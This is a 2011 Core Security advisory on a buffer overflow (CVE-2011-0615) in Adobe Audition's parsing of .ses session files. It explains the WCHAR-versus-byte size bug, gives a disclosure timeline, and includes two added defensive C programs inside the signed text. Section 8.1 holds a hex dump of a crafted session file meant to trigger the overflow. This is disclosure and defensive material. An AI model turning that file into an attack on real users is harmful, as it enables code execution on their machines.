Core Security Technologies Advisory 2011.0204

2011-05-12T00:00:00
ID PACKETSTORM:101374
Type packetstorm
Reporter Core Security Technologies
Modified 2011-05-12T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Core Security Technologies - Corelabs Advisory  
http://corelabs.coresecurity.com/  
  
Adobe Audition vulnerability processing malformed session file  
  
  
  
1. *Advisory Information*  
  
Title: Adobe Audition vulnerability processing malformed session file  
Advisory ID: CORE-2011-0204  
Advisory URL:  
http://www.coresecurity.com/content/Adobe-Audition-malformed-SES-file  
Date published: 2011-05-12  
Date of last update: 2011-05-12  
Vendors contacted: Adobe  
Release mode: Coordinated release  
  
  
  
2. *Vulnerability Information*  
  
Class: Buffer Overflow [CWE-119]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2011-0615  
  
  
  
3. *Vulnerability Description*  
  
Adobe Audition is a digital audio workstation software for Windows that  
was originally developed by Syntrillium as Cool Edit Pro and acquired  
by Adobe in 2003. The software allows users to do multitrack audio mixing  
and editing and supports storing multitrack audio in a session file  
format (.ses).  
  
Adobe Audition is vulnerable to numerous buffer overflows while parsing  
several fields inside the TRKM chunk of session (.ses) files. The  
resulting memory corruption can be leveraged to execute arbitrary code on  
vulnerable systems by enticing users to open specially crafted session  
files.  
  
This vulnerability could be used by a remote attacker to execute  
arbitrary code with the privileges of the user that opened the malicious  
file.  
  
  
4. *Vulnerable packages*  
  
. Adobe Audition 3.0.1.  
. Older versions are probably affected too, but they were not checked.  
  
  
5. *Non-vulnerable packages*  
  
. Adobe Audition CS5.5.  
  
  
6. *Vendor Information, Solutions and Workarounds*  
  
Adobe strongly recommends Audition users discontinue use of the Adobe  
Session (.ses) file format and switch to use of the XML session format.  
With the release of Audition CS5.5, the binary Audition Session (.ses)  
file format is no longer supported.  
  
  
7. *Credits*  
  
These vulnerabilities were discovered by Diego Juarez, Eduardo Koch and  
Laura Balian from Core Security Technologies. Additional research,  
exploitability analysis and PoC were made by Diego Juarez from Core  
Exploit Writers Team.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
Adobe Audition is vulnerable to numerous buffer overflows while parsing  
several fields inside the 'TRKM' chunk of session (.ses) files.  
  
The vulnerability comes from passing a wrongly computed maximum buffer  
size to the function found at address 0x483F065A. This function has a  
prototype similar to this:  
  
/-----  
unsigned int 483F065A(wchar_t *dest, unsigned int size, wchar_t *src);  
- -----/  
The 'size' parameter is expected to be a count of WCHARs, but (while  
parsing session files) the caller passes a size expressed in bytes. Since  
a WCHAR is two bytes wide, the function's own bounds check admits up to  
twice as many characters as the destination actually holds, leading to  
multiple buffer overflows in several fields of the 'TRKM' chunk of the  
session file.  
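
The following program is an added illustration of this root cause; it is  
not Adobe's code and the field layout (a 32-bit little-endian count of  
UTF-16 code units followed by the characters), the function names and the  
16-WCHAR destination are assumptions made for the example. It places a  
caller that passes `sizeof` (bytes) next to one that passes  
`sizeof / sizeof(element)` (WCHARs), and uses an instrumented copy routine  
that reports an out-of-bounds write instead of performing it, so the  
difference can be observed safely.

```c
/* Added example (not Adobe's code): models the WCHAR-vs-byte size confusion
 * described in section 8. Field layout, names and the 16-WCHAR destination
 * are assumptions made for this illustration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>

#define NAME_CAP 16      /* assumed destination capacity, in wchar_t units */
#define FIELD_MAX 256    /* assumed upper bound on one string field */

struct track {
    wchar_t name[NAME_CAP];   /* sizeof == 32 where wchar_t is 16-bit */
};

enum copy_result { COPY_OK, COPY_REJECTED, COPY_WOULD_OVERFLOW };

/* Bounded copy shaped like the quoted prototype: 'size' is the capacity in
 * WCHARs, terminator included. Unlike the real callee it is also told the
 * true capacity, so the demo reports an overflow instead of performing it. */
static enum copy_result copy_wstr(wchar_t *dest, unsigned int size,
                                  const wchar_t *src, unsigned int src_len,
                                  unsigned int true_cap)
{
    if (src_len + 1 > size)
        return COPY_REJECTED;          /* the callee's own check, in WCHARs */
    if (src_len + 1 > true_cap)
        return COPY_WOULD_OVERFLOW;    /* instrumentation only */
    memcpy(dest, src, src_len * sizeof(wchar_t));
    dest[src_len] = L'\0';
    return COPY_OK;
}

/* Reads one string field (assumed layout: u32 LE count of UTF-16 code units,
 * then the code units). Returns the count, or -1 if the field is malformed. */
static int read_field(const uint8_t *p, size_t len, wchar_t *tmp, size_t tmp_cap)
{
    uint32_t n, i;
    if (len < 4)
        return -1;
    n = (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    if (n > tmp_cap || len - 4 < (size_t)n * 2)
        return -1;                     /* count larger than the data present */
    for (i = 0; i < n; i++)
        tmp[i] = (wchar_t)(p[4 + 2 * i] | p[5 + 2 * i] << 8);
    return (int)n;
}

/* Buggy caller: sizeof yields BYTES, but the callee expects WCHARs, so the
 * callee's check admits twice as many characters as the buffer holds. */
static enum copy_result load_name_buggy(struct track *t, const uint8_t *f, size_t len)
{
    wchar_t tmp[FIELD_MAX];
    int n = read_field(f, len, tmp, FIELD_MAX);
    if (n < 0) return COPY_REJECTED;
    return copy_wstr(t->name, (unsigned int)sizeof t->name, tmp, (unsigned int)n, NAME_CAP);
}

/* Fixed caller: the capacity is expressed in the unit the callee expects. */
static enum copy_result load_name_fixed(struct track *t, const uint8_t *f, size_t len)
{
    wchar_t tmp[FIELD_MAX];
    int n = read_field(f, len, tmp, FIELD_MAX);
    if (n < 0) return COPY_REJECTED;
    return copy_wstr(t->name, (unsigned int)(sizeof t->name / sizeof t->name[0]),
                     tmp, (unsigned int)n, NAME_CAP);
}

/* Constructs a field of n 'A' characters (like the 0x41 run in the dump). */
static size_t build_field(uint8_t *out, unsigned int n)
{
    unsigned int i;
    out[0] = n & 0xff;         out[1] = (n >> 8) & 0xff;
    out[2] = (n >> 16) & 0xff; out[3] = (n >> 24) & 0xff;
    for (i = 0; i < n; i++) { out[4 + 2 * i] = 0x41; out[5 + 2 * i] = 0x00; }
    return 4 + 2 * (size_t)n;
}

/* One end-to-end scenario: a field of n characters through either caller. */
static enum copy_result demo(unsigned int n, int fixed)
{
    uint8_t buf[4 + 2 * FIELD_MAX];
    struct track t;
    size_t len;
    if (n > FIELD_MAX) return COPY_REJECTED;
    len = build_field(buf, n);
    return fixed ? load_name_fixed(&t, buf, len) : load_name_buggy(&t, buf, len);
}

int main(void)
{
    static const char *names[] = { "ok", "rejected", "WOULD OVERFLOW" };
    unsigned int n;
    for (n = 8; n <= 24; n += 8)
        printf("%2u chars: buggy=%s fixed=%s\n", n,
               names[demo(n, 0)], names[demo(n, 1)]);
    return 0;
}
```

A field of 8 characters is accepted by both callers; from 16 characters  
upward the buggy caller's check still passes while the fixed caller  
rejects the field, which is exactly the window the advisory describes.  
The general lesson for reviewers is that a capacity argument must carry  
the unit the callee documents, and that `sizeof` on a `wchar_t` array is  
the wrong value unless divided by the element size.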
  
  
8.1. *Proof of Concept*  
  
The following (dumped) .ses file should trigger the vulnerability.  
  
/-----  
  
00000000: 43 4F 4F 4C-4E 45 53 53-D5 01 00 00-54 52 4B 4D COOLNESS+? TRKM  
00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 Hú ? ? ?  
00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T  
00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?ú ?'  
00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e  
00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0  
00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ?  
00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @?  
00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i  
00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0  
000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s  
000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ?  
000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o  
000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ?  
000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o  
000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i  
00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o  
00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ?  
00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u  
00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ?  
00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @  
00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA  
00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001E0: 41 - - - A  
  
- -----/  
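
As a triage aid for files like the one dumped above, the following added  
program (not part of the advisory or of Adobe's software) performs two  
structural consistency checks. The layout it assumes is inferred from the  
dump: an 8-byte "COOLNESS" magic followed by a 32-bit little-endian length  
of the remainder (0x1D5, which matches the 481-byte dump minus its 12-byte  
header), then chunks made of a 4-byte tag and a 32-bit little-endian size.  
Under that assumption the TRKM chunk declares 0xA348 bytes while only 461  
follow it, which a defender's pre-parser can flag before the file reaches  
the real parser. The sample file is constructed in the program itself with  
a zero-filled body.

```c
/* Added example: structural sanity checks over a .ses file, for triage.
 * Layout assumed from the advisory's dump (not documented by Adobe here):
 * "COOLNESS" + u32 LE remaining length, then (4-byte tag + u32 LE size)
 * chunks. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum ses_verdict { SES_OK = 0, SES_BAD_MAGIC, SES_BAD_TOTAL,
                   SES_CHUNK_TOO_BIG, SES_TRUNCATED };

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Walks the chunk list once and stops at the first inconsistency. 'bad_tag'
 * (5 bytes) receives the tag of the offending chunk, or "" if none. */
static enum ses_verdict check_ses(const uint8_t *f, size_t len, char bad_tag[5])
{
    size_t off;
    bad_tag[0] = '\0';
    if (len < 12 || memcmp(f, "COOLNESS", 8) != 0)
        return SES_BAD_MAGIC;
    if (le32(f + 8) != len - 12)          /* header length must match the file */
        return SES_BAD_TOTAL;
    for (off = 12; off < len; ) {
        uint32_t size;
        if (len - off < 8)
            return SES_TRUNCATED;         /* not even room for a chunk header */
        memcpy(bad_tag, f + off, 4);
        bad_tag[4] = '\0';
        size = le32(f + off + 4);
        if (size > len - off - 8)         /* declared size exceeds what is left */
            return SES_CHUNK_TOO_BIG;
        off += 8 + size;
    }
    bad_tag[0] = '\0';
    return SES_OK;
}

/* Constructed sample mirroring the dump's two headers: total length 0x1D5
 * (481 - 12) and a TRKM chunk whose size field is 'trkm_size'. The body is
 * zero-filled. Returns the sample length, or 0 if 'out' is too small. */
static size_t build_sample(uint8_t *out, size_t cap, uint32_t trkm_size)
{
    const size_t total = 481;
    if (cap < total)
        return 0;
    memset(out, 0, total);
    memcpy(out, "COOLNESS", 8);
    out[8] = 0xD5; out[9] = 0x01; out[10] = 0x00; out[11] = 0x00;
    memcpy(out + 12, "TRKM", 4);
    out[16] = trkm_size & 0xff;         out[17] = (trkm_size >> 8) & 0xff;
    out[18] = (trkm_size >> 16) & 0xff; out[19] = (trkm_size >> 24) & 0xff;
    return total;
}

/* Builds a sample with the given TRKM size and returns the checker's verdict. */
static enum ses_verdict demo_verdict(uint32_t trkm_size)
{
    uint8_t f[481];
    char tag[5];
    size_t n = build_sample(f, sizeof f, trkm_size);
    return check_ses(f, n, tag);
}

int main(void)
{
    static const char *names[] = { "ok", "bad magic", "total length mismatch",
                                   "chunk size exceeds file", "truncated chunk" };
    uint8_t f[481];
    char tag[5];
    size_t n = build_sample(f, sizeof f, 0xA348);   /* value from the dump */
    enum ses_verdict v = check_ses(f, n, tag);
    printf("dump-like sample: %s (chunk '%s')\n", names[v], tag);
    printf("consistent sample: %s\n", names[demo_verdict(461)]);
    return 0;
}
```

A TRKM size of 461 (exactly the bytes remaining) passes, 0xA348 as in the  
dump is reported as a chunk size exceeding the file, and a size one byte  
short leaves an unparseable 1-byte tail and is reported as truncated.  
Checks like these do not prove a file is safe, but they reject the class of  
inconsistent inputs that a lenient parser would otherwise act on.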
  
  
  
9. *Report Timeline*  
  
. 2011-02-03:  
Core Advisories Team notifies Adobe PSIRT of several crashes in Adobe  
Audition and asks for technical assistance in order to determine whether  
these crashes can result in a security vulnerability.  
  
. 2011-02-03:  
Vendor acknowledges receipt of the last email and notifies that Adobe  
tracking number 850 was opened to track this issue.  
  
. 2011-02-24:  
Core notifies that there has been no communication in the last 3 weeks  
and asks for a status update about the reported crashes.  
  
. 2011-02-28:  
Adobe PSIRT notifies that the file format affected by the issue will no  
longer be supported with the next release of Audition, planned for May  
2011. Vendor also notifies their plan to publish a Security Bulletin,  
including an acknowledgement for this report.  
  
. 2011-03-09:  
Core notifies that the impact of these bugs is not clear and requests  
technical information to understand the nature and root cause of the  
reported crashes rather than purely information about Adobe's release  
decisions. Core also requests that Adobe clarify whether this bug is  
considered exploitable and asks whether patches or fixes are going to be  
released as well.  
  
. 2011-03-16:  
Core asks for a status update.  
  
. 2011-03-16:  
PSIRT notifies that they have not done any analysis to determine whether  
this issue is exploitable because:  
  
1. The .ses file format is an older format that will not be supported  
with the next release.  
2. The .ses files store information about a recording session; they  
are not typically exchanged between parties over email, and are even  
less likely to be accepted and opened from non-trusted sources.  
3. Adobe has been encouraging people to use XML files in place of the  
binary .ses file format for the last year [1].  
4. The installed base for Audition is small compared with  
higher-profile Adobe products.  
  
For the above-mentioned reasons, the vendor considers that it is not a  
high priority to perform a vulnerability analysis. The vendor also  
notifies that they are currently planning to publish a Security Bulletin  
in May 2011 with the release of the next major version of Audition.  
  
. 2011-04-04:  
Core notifies that additional research was done by Diego Juarez and that  
the reported flaws seem to be exploitable. Core notifies that the advisory  
will be released when the Adobe patches become available.  
  
. 2011-04-04:  
Vendor notifies that the Adobe ID 897 was opened to track this case and  
they are on track for releasing patches in May.  
  
. 2011-04-28:  
Core notifies that the advisory publication was rescheduled to May 10th  
and requests confirmation of a coordinated release. Core also requests  
further information regarding the affected and patched version numbers.  
  
. 2011-05-05:  
Vendor notifies that these issues should be resolved in the upcoming  
release of Adobe Audition planned for May 10th.  
  
. 2011-05-06:  
Vendor notifies that due to a last minute change, the release was  
tentatively rescheduled for May 12th.  
  
. 2011-05-06:  
Core reschedules advisory publication for May 12th.  
  
. 2011-05-12:  
Advisory CORE-2011-0204 is published.  
  
  
  
10. *References*  
  
[1] http://blogs.adobe.com/insidesound/2010/03/audition_xml_session_format.html  
  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://corelabs.coresecurity.com.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies enables organizations to get ahead of threats  
with security test and measurement solutions that continuously identify  
and prove real-world exposures to their most critical assets. Our  
customers can gain real visibility into their security standing, real  
validation of their security controls, and real metrics to more  
effectively secure their organizations.  
  
Core Security's software solutions build on over a decade of trusted  
research and leading-edge threat expertise from the company's Security  
Consulting Services, CoreLabs and Engineering groups. Core Security  
Technologies can be reached at +1 (617) 399-6980 or on the Web at:  
http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2011 Core Security  
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative  
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)  
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
  
iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg  
6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d  
=EybH  
-----END PGP SIGNATURE-----  